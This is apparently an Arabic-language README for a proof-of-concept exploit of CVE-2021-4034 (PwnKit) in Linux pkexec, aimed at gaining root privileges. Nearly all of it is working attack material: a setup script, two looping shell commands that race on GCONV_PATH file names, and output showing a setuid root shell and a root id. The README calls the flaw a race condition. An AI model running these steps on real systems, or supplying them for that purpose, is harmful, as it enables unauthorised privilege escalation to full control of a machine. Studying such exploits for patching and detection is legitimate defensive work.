
استغلال لثغرة CVE-2021-4034 (PwnKit) يستفيد من حالة سباق في pkexec لرفع الصلاحيات إلى الجذر على أنظمة لينكس.
استغلال لـ ثغرة pwnkit من فريق Qualys.
يفترض هذا الاستغلال وجود gcc على الجهاز المستهدف.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
قم بتشغيل الأمر التالي في جلسة bash واحدة:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
قم بتشغيل الأمر التالي في جلسة bash أخرى:
while :; do ./exploit; done
ستفوز في النهاية بالسباق وتحصل على ملف ثنائي shell يمنحك
صلاحيات الجذر:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
يمكنك العثور على شرح موجز للتقنية في مدونتي.